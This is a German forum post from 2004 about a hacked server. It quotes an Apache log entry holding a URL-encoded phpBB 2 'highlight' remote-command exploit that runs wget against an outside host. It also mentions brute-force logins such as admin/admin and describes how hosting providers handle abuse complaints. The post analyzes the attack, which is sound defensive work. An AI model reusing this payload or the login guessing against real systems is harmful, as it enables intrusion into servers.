Thema: Server gehacked
Einzelnen Beitrag anzeigen
Alt 03.12.2004, 23:25   #36
Philipp
verXENt
 
Benutzerbild von Philipp
 
Registriert seit: 01.08.1999
Beiträge: 7.084

Mein Computer

Standard
Zitat:
Original geschrieben von Sloter
1, Was siehst du da?
Das da:
69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30& rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77
%67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7
3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63%
6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45
%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75
%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%7
2%75%73%68%5D%29.%2527 HTTP/1.1" 200 6025 "-" "-"

Diese Anfrage wurde mittels eines im Umlauf befindlichen Perl Scripts generiert, welches es erlaubt beliebige Shell Befehle über phpBB 2 auszuführen.

Zitat:
Original geschrieben von Sloter
2, Yep, wenn sich ein Ami beschwert.
Ich würde es aber dennoch vermeiden Raubkopien meines CMS System auf einen The Planet Server zum Download anzubieten . Die letzte Beschwerde kam ohne Probleme durch.

Zitat:
Original geschrieben von Sloter
3, Ich auch, aber das ich mir die tägliche Arbeit ersparre, verwende ich ein Script zum einlogen.
Ich kann jetzt gar nicht erklären, warum das Script irre gelaufen ist, ich wollte mich nur auf meinem Server einlogen.
Du loggst dich in 50 Accounts gleichzeitig ein z.B. admin/admin oder www-data usw.

Zitat:
Original geschrieben von Sloter
Apropo, der Server ist noch immer online und ich verwette eine kostenlose .info das er online bleibt ;-)
Nur eine? Nicht 25

Hat Dumdideldum den Server überhaupt gemeldet? Je nach Situation kann es auch durchaus sein das er online bleibt.

Möglichkeit #1
Der Server selber wurde kompromitiert

In diesen Fall wird er vom Netz genommen und muss neu installiert werden. Ein Reimage der Platte kostet $75 und einige Stunden Downtime. Sobald der Server clean ist wird er wieder angeschlossen.

Möglichkeit #2
Der Kunde einer Webhostingfirma die diesen Server gemietet hat spielt Script Kiddy oder Spammer

In diesen Fall bekommt der Serverbetreiber ein Trouble Ticket von der Abuse Abteilung das er innerhalb 24 Stunden beantworten sollte. Wenn er koopieriert, wird beim ersten Mal noch ein Auge zugedrückt.
Philipp ist offline   Mit Zitat antworten